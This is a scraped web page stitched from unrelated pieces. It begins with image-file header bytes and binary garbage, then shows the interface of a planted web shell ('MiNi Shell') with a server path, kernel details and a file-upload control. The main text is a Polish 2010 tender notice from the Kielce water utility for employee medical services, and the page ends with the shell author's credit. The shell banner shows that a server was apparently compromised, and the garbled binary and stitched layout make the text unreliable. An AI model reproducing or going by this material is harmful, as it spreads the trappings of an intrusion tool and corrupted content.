JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20100127/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20100127/17821-N-2010.html

<p class="kh_header"><b>Kielce: Świadczenia medyczne dla osób zatrudnionych w Spółce z o.o. Wodociągi Kieleckie</b><br>
<b>Numer ogłoszenia: 17821 - 2010; data zamieszczenia: 27.01.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Wodociągi Kieleckie Sp. z o.o. , ul. Krakowska 64, 25-701 Kielce, woj. świętokrzyskie, tel. 041 3653100, faks 041 3455220.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.wod-kiel.com.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Podmiot prawa publicznego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Świadczenia medyczne dla osób zatrudnionych w Spółce z o.o. Wodociągi Kieleckie.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest usługa  udzielania świadczeń zdrowotnych, pracownikom zatrudnionym w WODOCIĄGACH  KIELECKICH. Zakres usługi został podzielony na dwa zadania.

ZADANIE Nr 1: świadczenia zdrowotne w zakresie:

- zgodnym z Kodeksem Pracy tj.

a) badania wstępne,
b) badania okresowe,
c) badania kontrolne, 
d) szczepienia ochronne pracowników na stanowiskach  pracy zagrożonych  
    czynnikami biologicznymi,
e) badania na nosicielstwo, związane z uaktualnieniem książeczek zdrowia dla celów 
  sanitarno - epidemiologicznych,
f) badania psychologiczne kierowców,
g) udział lekarza w pracach Zakładowej Komisji BHP.

- zgodnym z Układem Zbiorowym Pracy tj. 

h) badania mammograficzne wraz z  USG ( kobiety po 40 roku życia), 
i) USG  ( badanie piersi, kobiet poniżej 40 roku życia) ,
j) badanie prostaty wraz z analizą krwi  ( PSA ).


Ad. a) b) c) Badania wstępne, okresowe i kontrolne będą wykonywane na podstawie
  Skierowania na badania profilaktyczne, wystawianego przez Dział Spraw Pracowniczych Spółki w placówkach medycznych wskazanych przez Wykonawcę. 
Zakres analiz laboratoryjnych winien obejmować: 

a) badanie krwi w zakresie:	- morfologia ogólna,
- OB,
- poziom cukru,
- cholesterol całkowity,
- HDL,
- LDL,
- TG.
b) analiza ogólna moczu,
c) prześwietlenie płuc*).

*) Jeżeli w trakcie, wykonywania badań wskazanych w punktach a, b i c, pracownik zrezygnuje z prześwietlenia płuc, oferowaną ryczałtową kwotę za te badania należy pomniejszyć o cenę prześwietlenia (wartość  podana w formularzu ofertowym ). Rezygnacja ta winna być potwierdzona podpisem pracownika. 

Badanie okulistyczne osób ze wskazaniem praca przy monitorze ekranowym winno być udokumentowane zaświadczeniem o konieczności stosowania okularów korekcyjnych  oraz zleceniem na wykonanie okularów, w sytuacji kiedy przeprowadzone badania wykażą konieczność korekty wzroku.

Szczepienia ochronne pracowników na stanowiskach  pracy zagrożonych czynnikami 
biologicznymi, będą wykonywane w terminach zgodnych z indywidualnym kalendarzem szczepień, w placówce wskazanej przez Wykonawcę lub w siedzibie jednostek terenowych Spółki,  po uprzednim uzgodnieniu terminów przez zainteresowane strony.

 Badania na nosicielstwo, związane z uaktualnieniem książeczek zdrowia dla celów sanitarno - epidemiologicznych i  badania psychologiczne kierowców, będą wykonywane zgodnie z obowiązującymi przepisami w tym zakresie.

Udział lekarza w pracach Zakładowej Komisji BHP; wyjazdy z komisją BHP na obiekty Spółki w celu przeprowadzenia przeglądów  pod względem bezpieczeństwa i higieny pracy, kontrola wykonania zaleceń, udział w posiedzeniach komisji.

Badania mammograficzne wraz z  USG, wykonywane będą w roku 2010 w jednostce medycznej wskazanej przez Wykonawcę, w terminie uzgodnionym z Zamawiającym- orientacyjną ilość osób do wykonania przedmiotowego badania zawiera załącznik nr 2, Formularz cenowy.

Badanie prostaty wraz z analizą krwi  ( PSA ), wykonywane będą w roku 2010 w jednostce medycznej wskazanej przez Wykonawcę, w terminie uzgodnionym z Zamawiającym, orientacyjną ilość osób do wykonania przedmiotowego badania zawiera załącznik nr 2,  Formularz cenowy.


ZADANIE Nr 2:  Dostawa szczepionek przeciwko grypie sezonowej  wraz z wykonaniem szczepień ochronnych pracowników.

Wykonawca w zakresie ZADANIA Nr 2 zobowiązany jest dostarczyć szczepionki  przeciw grypie w ilości wskazanej przez Zamawiającego. Przed wykonaniem zabiegu lekarz winien przeprowadzić badanie pracowników. Szczepienia ochronne przeciwko grypie sezonowej, będą wykonywane na przełomie III i IV kwartału w latach obowiązywania umowy, w siedzibie oraz  w jednostkach terenowych Zamawiającego; przewóz personelu medycznego i materiałów koniecznych do przeprowadzenia szczepień zostanie zabezpieczony przez Zamawiającego na jego koszt. Szczepienia przeciwko grypie należy wycenić kompleksowo w zł/ osobę, uwzględniając  koszty pracy personelu medycznego oraz koszt materiałów koniecznych do właściwego wykonania usługi.

Ogólne warunki świadczenia usługi.

Przedmiot zamówienia winien być realizowany zgodnie z ustawą z dnia 27 czerwca 1997r. O służbie  medycyny pracy ( tekst jednolity  Dz. U. 2004 nr 125 poz. 1317 z późniejszymi zmianami ) oraz  rozporządzeniem Ministra Zdrowi i Opieki Społecznej z dnia 30 maja 1996 r. w sprawie przeprowadzenia badań lekarskich pracowników, zakresu profilaktycznej opieki zdrowotnej nad pracownikami oraz orzeczeń lekarskich wydawanych do celów przewidzianych w Kodeksie pracy ( Dz. U. 1996 nr 69 poz. 332 z późniejszymi zmianami ). 

       Zamawiający wymaga, aby świadczenia w zakresie przedmiotu zamówienia realizowane były w placówce wskazanej przez  Wykonawcę w dni robocze w godzinach od 7:00 do 15:00. Dodatkowo, Wykonawca zobowiązany jest zapewnić, co najmniej dwa razy w tygodniu konsultacje medyczne, także w godzinach popołudniowych. Zamawiający zastrzega  sobie możliwość rejestracji telefonicznej.

Zamawiający dopuszcza zlecenie badań: mammografia, USG i prostata,  innemu Wykonawcy tj. placówce ochrony zdrowia która wykonuje badania specjalistyczne. 

- Placówka wykonująca badania mammograficzne i USG, zobowiązana jest do dostarczenia wyników badań, w zaklejonych kopertach z nazwiskiem osoby badanej do siedziby Zamawiającego.

- Laboratorium wykonujące badanie krwi ( PSA ), zobowiązane jest do przekazania wyników badań do placówki medycznej, wskazanej jako Wykonawca badań prostaty.

Zamawiający nie dopuszcza możliwości wykonywania świadczeń medycznych będących przedmiotem zamówienia poza terenem miasta Kielce - nie dotyczy szczepień profilaktycznych i ochronnych, które mogą być wykonywane na terenie obiektów Spółki. 

Szacunkową ilość świadczeń medycznych, za okres obowiązywania umowy ( 24 miesiące od dnia jej podpisania )  zawiera Formularz cenowy - Załącznik nr 2.
	
Spółka z o.o. Wodociągi Kieleckie zastrzega sobie prawo do zmniejszenia ilości zleconych świadczeń, co nie będzie odstąpieniem od warunków umowy. Rzeczywista ilość świadczeń wynikać będzie z bieżących potrzeb Zamawiającego..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 85.10.00.00-0, 85.14.70.00-1.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 24.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Udział w postępowaniu nie wymaga wniesienia wadium<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> O zamówienie mogą ubiegać się Wykonawcy którzy spełniają warunki, dotyczące:

1.1	posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania;
1.2	posiadania wiedzy i doświadczenia;
1.3	dysponowania odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia; 
1.4	sytuacji ekonomicznej i finansowej,
1.5	nie podlegają wykluczeniu z postępowania.
Ocena spełnienia warunków odbędzie się na podstawie złożonych oświadczeń i dokumentów niżej wymienionych, według formuły : spełnia - nie spełnia..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> Zamawiający oceniając potwierdzenie spełnienia warunków udziału w postępowaniu wymaga:

W zakresie warunku wskazanego w pkt. III 2) ppkt.1.1 ocena spełnienia warunku nastąpi na podstawie przedstawionego przez Wykonawcę oświadczenia, iż posiada uprawnienia do wykonywania świadczeń zdrowotnych w zakresie zgodnym z przedmiotem zamówienia.

W zakresie warunku wskazanego w pkt. III 2) ppkt.1.2 wymagane jest wykonanie przez Wykonawcę w okresie ostatnich trzech lat przed wszczęciem postępowania o udzielenie zamówienia, jeżeli okres działalności jest krótszy to w tym okresie, świadczeń medycznych odpowiadających swoim rodzajem usłudze stanowiącej przedmiot zamówi enia. W celu potwierdzenia spełnienia tego warunku, Zamawiający żąda złożenia informacji o wykonanych świadczeniach medycznych z podaniem ich wartości, przedmiotu i odbiorców. 


W zakresie warunku wskazanego w pkt. III 2) ppkt.1.3 wymagane jest dysponowanie osobami zdolnymi do wykonywania usługi i posiadanie zaplecza technicznego niezbędnego do realizacji przedmiotu zamówienia. W celu potwierdzenia spełnienia tego warunku, Zamawiający żąda złożenia:

-  wykazu placówek medycznych w których będzie realizowany przedmiot zamówienia z podaniem ich nazw i adresów.

- imiennego wykazu specjalistycznego personelu medycznego wraz z podaniem godzin przyjęć w poszczególnych dniach tygodnia.


W zakresie warunku wskazanego w pkt. III 2) ppkt. 1.4 wymagane jest złożenie oświadczenia o posiadaniu środków finansowych  na realizację usługi.

W zakresie warunku wskazanego w pkt. III 2) ppkt.1.5  wymagane jest złożenie;

A) Oświadczenia o braku podstaw do wykluczenia, wzór oświadczenia stanowi  zał.  nr 3.

B) Aktualnego odpisu z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt. 2 ustawy,  wystawionego nie wcześniej niż 6 m-cy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;

C)Aktualnego zaświadczenia  właściwego naczelnika urzędu skarbowego potwierdzającego, że Wykonawca nie zalega z opłacaniem podatków, lub zaświadczenia, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawionego nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.

D) Aktualnego zaświadczenia  właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzającego, że Wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenia, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawionego nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.
Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentów B, C i D Wykonawca składa dokument lub dokumenty wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że:
a)  nie otwarto jego likwidacji lub nie ogłoszono upadłości,
b) nie zalega z uiszczeniem podatków, opłat, składek na ubezpieczenia społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu,
c) nie orzeczono wobec niego zakazu ubiegania się o zamówienie.
Dokumenty o których mowa w punkcie  a) i c)  powinny być wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia lub składania ofert.
Dokument o którym mowa w punkcie b) powinien być wystawiony  nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia lub składania ofert.
Jeżeli w kraju pochodzenia osoby lub w kraju w którym Wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów o których mowa powyżej, zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju pochodzenia osoby lub kraju w którym Wykonawca ma siedzibę lub miejsce zamieszkania.
Dokumenty są składane w formie oryginału lub kopii poświadczonej za zgodność z oryginałem przez Wykonawcę. W przypadku składania elektronicznych kopii dokumentów powinny być one opatrzone przez Wykonawcę bezpiecznym podpisem elektronicznym weryfikowanym za pomocą ważnego kwalifikowanego certyfikatu.
Zamawiający może żądać przedstawienia oryginału lub notarialnie poświadczonej kopii dokumentu wyłącznie wtedy, gdy złożona przez Wykonawcę kopia dokumentu jest nieczytelna lub budzi wątpliwości co do jej prawdziwości.
Dokumenty sporządzone w języku obcym są składane wraz z tłumaczeniem na język polski. 
 Zamawiający wezwie Wykonawców, którzy w wyznaczonym terminie nie złożyli oświadczeń lub dokumentów, lub którzy złożyli dokumenty zawierające błędy, do ich uzupełnienia w wyznaczonym terminie.
 Wykonawcy występujący wspólnie muszą ustanowić pełnomocnika do reprezentowania ich w postępowaniu albo do reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego. Dokument potwierdzający ustanowienie pełnomocnika powinien zawierać wskazanie postępowania którego dotyczy, Wykonawców ubiegających się wspólnie o zamówienie oraz zakres jego umocowania także oświadczenie o przyjęciu wspólnej odpowiedzialności za wykonanie lub  nienależyte wykonanie zamówienia. Winien on być podpisany przez wszystkich Wykonawców ubiegających się wspólnie o zamówienie publiczne. Podpisy muszą być złożone przez osoby uprawnione do składania oświadczeń woli wymienione we właściwym rejestrze. Dokument pełnomocnika należy przedstawić w formie oryginału. Wszelka korespondencja oraz rozliczenia dokonywane będą wyłącznie z podmiotem występującym jako pełnomocnik.
Jeżeli oferta Wykonawców występujących wspólnie zostanie wybrana, Zamawiający może zażądać przed zawarciem umowy w sprawie zamówienia publicznego, umowy regulującej współpracę tych Wykonawców..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.wod-kiel.com.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Wodociągi Kieleckie Sp. z o.o. 25-701 Kielce ul. Krakowska 64, Biuro Obsługi Klienta.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 05.02.2010 godzina 09:45, miejsce: Wodociągi Kieleckie Sp. z o.o. 25-701 Kielce ul. Krakowska 64, Biuro Obsługi Klienta.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com